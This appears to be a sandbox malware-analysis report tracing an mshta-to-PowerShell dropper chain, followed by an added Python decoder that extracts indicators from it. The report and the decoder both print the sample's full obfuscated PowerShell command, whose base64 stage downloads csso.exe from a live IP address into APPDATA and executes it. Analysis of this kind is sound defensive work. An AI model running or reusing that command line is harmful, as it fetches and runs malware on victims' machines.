                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.pdb source: powershell.exe, 00000003.00000002.1399001221.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
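                    The PowerShell command line carries two obfuscation layers: the outer string is assembled from quoted fragments and [char] codes (0x3A and 58 are ':', 0x22 and 34 are '"'), and once joined it is a plain [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) call whose argument is the second stage. The Python below is an added example, not part of the report or of Joe Sandbox: it folds the concatenation, decodes the base64, collapses the long runs of spaces the author padded the script with, and pulls out the URL, drop path, P/Invoke library, cmdlets and PowerShell host switches. The command line is the one recorded in the process-creation entries of this report (the sample's own data, not a constructed string); the regular expressions are mine and are tuned to this family rather than to arbitrary PowerShell.

```python
"""Decode the layered PowerShell launcher from the uhg.hta chain and pull its IOCs."""
import base64
import re

# The cmd.exe command line spawned by mshta.exe, copied from this report's process-creation entries.
SAMPLE_CMDLINE = r'''"C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"'''

CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)   # [cHAr]0x3A, [CHaR]58, ...
STRING_JOIN = re.compile(r"'\s*\+\s*'")                           # 'a'+'b'  ->  'ab'
B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.I)


def fold_concatenation(expr: str) -> str:
    """Resolve [char]N pieces and glue adjacent single-quoted literals back together.
    After this, the inner iex() argument reads as the plain GetString(FromBase64String(...)) call."""
    expr = CHAR_TOKEN.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", expr)
    return STRING_JOIN.sub("", expr)


def decode_stage(cmdline: str) -> str:
    """Return the second-stage script with its space padding collapsed to single spaces."""
    folded = fold_concatenation(cmdline)
    m = B64_ARG.search(folded)
    if not m:
        raise ValueError("no FromBase64String() argument found")
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding in other samples
    # The script calls UTF8.GetString explicitly; an -EncodedCommand blob would be UTF-16LE instead.
    script = base64.b64decode(blob).decode("utf-8")
    return re.sub(r"\s+", " ", script).strip()


def extract_iocs(script: str) -> dict:
    """Download URL, drop path, P/Invoke library and cmdlets used by the decoded stage."""
    url = re.search(r"""https?://[^\s"']+""", script)
    call = re.search(r'URLDownloadToFile\(\s*\d+\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"', script, re.I)
    lib = re.search(r'DllImport\(\s*"([^"]+)"', script, re.I)
    # Verb-Noun tokens not preceded by '-' (so parameters such as -MemberDefinition are skipped).
    cmdlets = re.findall(r"(?<![\w-])([A-Za-z]+-[A-Za-z]+)(?=[\s(])", script)
    return {
        "url": url.group(0) if url else None,
        "download_path": call.group(2) if call else None,
        "pinvoke_library": lib.group(1).lower() if lib else None,
        "cmdlets": [c.lower() for c in cmdlets],
    }


def host_switches(cmdline: str) -> list:
    """PowerShell host switches before the -C script: ex = ExecutionPolicy, nop = NoProfile, w = WindowStyle."""
    m = re.search(r"powershell\.exe\s+(.*?)\s-c\s", cmdline, re.I)
    return [s.lower() for s in re.findall(r"(?:^|\s)-([A-Za-z]+)", m.group(1))] if m else []


if __name__ == "__main__":
    stage2 = decode_stage(SAMPLE_CMDLINE)
    print(stage2)
    print(host_switches(SAMPLE_CMDLINE))
    print(extract_iocs(stage2))
```

On this sample the decoded stage is a single line: Add-Type -MemberDefinition with a C# DllImport of urlmon.dll!URLDownloadToFile (randomly named type HuwJrMudHL in namespace edv, -PassThru), then $j::URLDownloadToFile(0,"http://23.95.235.28/50/csso.exe","$eNV:APPDATA\csso.exe",0,0), Start-Sleep 3 and Invoke-Item on the dropped file. That explains the rest of the tree: Add-Type is why csc.exe and cvtres.exe run under powershell.exe and why hbmngfjp.dll appears in %LOCALAPPDATA%\Temp, and URLDownloadToFile is why the download also shows up in the INetCache folder (csso[1].exe). Block the IP and the URL, and hunt for Add-Type command lines that mention urlmon.dll.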
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00024B37 LoadLibraryA,GetProcAddress,6_2_00024B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_029D67BB push es; iretd 3_2_029D67CA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_029D0A18 pushad ; iretd 3_2_029D0ABD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_029D69FB push ds; iretd 3_2_029D6A0A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_029D56F8 pushad ; ret 3_2_029D5721
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_029D5728 pushfd ; ret 3_2_029D5731
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00048945 push ecx; ret 6_2_00048958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\csso.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_000248D7
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_000A5376
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00043187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00043187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\csso.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\csso.exe API/Special instruction interceptor: Address: A72514
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 6823
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7738
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exe API coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 7340 Thread sleep count: 6823 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep count: 7738 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep count: 1890 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0008445A
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008C6D1 FindFirstFileW,FindClose,6_2_0008C6D1
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0008C75C
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008EF95
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008F0F2
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008F3F3
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_000837EF
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00083B12
                    Source: C:\Users\user\AppData\Roaming\csso.exe Code function: 6_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008BCBC
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_000249A0
Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1404410976.0000000007E61000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1402683143.0000000006E49000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
